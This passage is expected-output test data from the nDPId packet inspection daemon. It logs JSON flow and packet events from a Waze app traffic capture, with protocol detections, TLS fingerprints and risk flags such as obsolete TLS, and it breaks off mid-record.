00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1435587867753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867753,"pkt":"ABoRAAACABoRAAABCABFAABMdHBAABAR2AjIWUvGCggAAQB7tIYAOEf+HAIA7AAAAUgAAAbvyDaVGNk70ieZS5oL2TvTm3FocpbZO9ObncvLHNk705ud0JHn"} 
-00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1435587868633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868633,"pkt":"ABoRAAACABoRAAABCABFAAAodHNAABAG0cE25uOsCggAAQBQsdllSURwmra7kFAS\/\/\/ZDAAA"} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868634,"flow_last_seen":1435587868634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868634,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1435587868634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868634,"pkt":"ABoRAAACABoRAAABCABFAAA8jYZAAEAGx0MKCAABLjOtto0EAbvOcuGFAAAAAKAC\/\/+3SQAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1435587868635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAAodHRAABAGEGouM622CggAAQG7jQQxjR56znLhhlAS\/\/87IAAA"} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868635,"flow_last_seen":1435587868635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868635,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1435587868635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAA8H6lAAEAGNSEKCAABLjOtto0GAbtbbHOtAAAAAKAC\/\/+YJQAAAgQFtAQCCAoACGwEAAAAAAEDAwg="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1435587868644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAodHVAABAGEGkuM622CggAAQG7jQakk4xSW2xzrlAS\/\/87HgAA"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version 
(1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
-01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application 
